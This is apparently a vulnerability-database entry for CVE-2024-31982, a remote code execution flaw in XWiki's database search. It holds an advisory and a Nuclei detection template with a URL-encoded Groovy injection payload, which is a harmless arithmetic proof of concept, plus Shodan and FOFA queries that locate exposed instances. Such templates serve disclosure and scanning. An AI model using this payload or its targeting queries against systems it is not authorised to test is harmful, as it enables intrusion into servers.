XWiki < 4.10.20 - Remote code execution

2024-06-1810:35:02

ProjectDiscovery

github.com

xwiki platform

database search

remote code execution

vulnerability

patch

10 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

7.6 High

AI Score

Confidence

Low

0.001 Low

EPSS

Percentile

28.2%

JSON

XWiki Platform is a generic wiki platform. Starting in version 2.4-milestone-1 and prior to versions 4.10.20, 15.5.4, and 15.10-rc-1, XWiki's database search allows remote code execution through the search text. This allows remote code execution for any visitor of a public wiki or user of a closed wiki as the database search is by default accessible for all users. This impacts the confidentiality, integrity and availability of the whole XWiki installation. This vulnerability has been patched in XWiki 14.10.20, 15.5.4 and 15.10RC1. As a workaround, one may manually apply the patch to the page `Main.DatabaseSearch`. Alternatively, unless database search is explicitly used by users, this page can be deleted as this is not the default search interface of XWiki.

id: CVE-2024-31982

info:
  name: XWiki < 4.10.20 - Remote code execution
  author: ritikchaddha
  severity: critical
  description: |
    XWiki Platform is a generic wiki platform. Starting in version 2.4-milestone-1 and prior to versions 4.10.20, 15.5.4, and 15.10-rc-1, XWiki's database search allows remote code execution through the search text. This allows remote code execution for any visitor of a public wiki or user of a closed wiki as the database search is by default accessible for all users. This impacts the confidentiality, integrity and availability of the whole XWiki installation. This vulnerability has been patched in XWiki 14.10.20, 15.5.4 and 15.10RC1. As a workaround, one may manually apply the patch to the page `Main.DatabaseSearch`. Alternatively, unless database search is explicitly used by users, this page can be deleted as this is not the default search interface of XWiki.
  impact: |
    Successful exploitation could lead to remote code execution.
  remediation: |
    Apply the vendor-supplied patch or upgrade to a 14.10.20 ,15.5.4, 15.10-rc-1.
  reference:
    - https://jira.xwiki.org/browse/XWIKI-21472
    - https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-2858-8cfx-69m9
    - https://jira.xwiki.org/browse/XWIKI-21110
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-31982
    cwe-id: CWE-95
    epss-score: 0.0015
    epss-percentile: 0.50461
    cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    verified: true
    vendor: xwiki
    product: xwiki
    shodan-query: html:"data-xwiki-reference"
    fofa-query: body="data-xwiki-reference"
  tags: cve,cve2024,xwiki,rce

http:
  - method: GET
    path:
      - "{{BaseURL}}/xwiki/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20"
      - "{{BaseURL}}/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20"

    skip-variables-check: true
    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "Hello from search text:42</title>", "<title>RSS feed")'
          - 'contains(header, "text/javascript")'
          - 'status_code == 200'
        condition: and
# digest: 490a0046304402206ca80433a32e2a6efa19df74d8ed4c1c6c9c29e76a031d639cd2e448d4fc37f002204cc55c53dc9d7eaf53d15cd3026a2df29c35fde224502778643de5a50d58fc6e:922c64590222798bb761d5b6d8e72950